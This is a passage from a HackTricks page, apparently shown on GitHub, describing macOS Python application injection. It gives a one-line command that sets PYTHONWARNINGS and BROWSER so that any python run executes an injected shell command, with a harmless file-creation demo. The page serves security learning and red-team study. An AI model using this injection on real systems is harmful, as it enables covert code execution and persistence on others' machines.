Skip to content

Latest commit

 

History

History
43 lines (29 loc) · 2.68 KB

File metadata and controls

43 lines (29 loc) · 2.68 KB

macOS Python Applications Injection

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Via PYTHONWARNINGS and BROWSER env variables

It's possible to alter both environment variables to execute arbitrary code whenever python is called, for example:

{% code overflow="wrap" %}

# Generate example python script
echo "print('hi')" > /tmp/script.py

# RCE which will generate file /tmp/hacktricks
PYTHONWARNINGS="all:0:antigravity.x:0:0" BROWSER="/bin/sh -c 'touch /tmp/hacktricks' #%s" python3 /tmp/script.py

{% endcode %}

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks: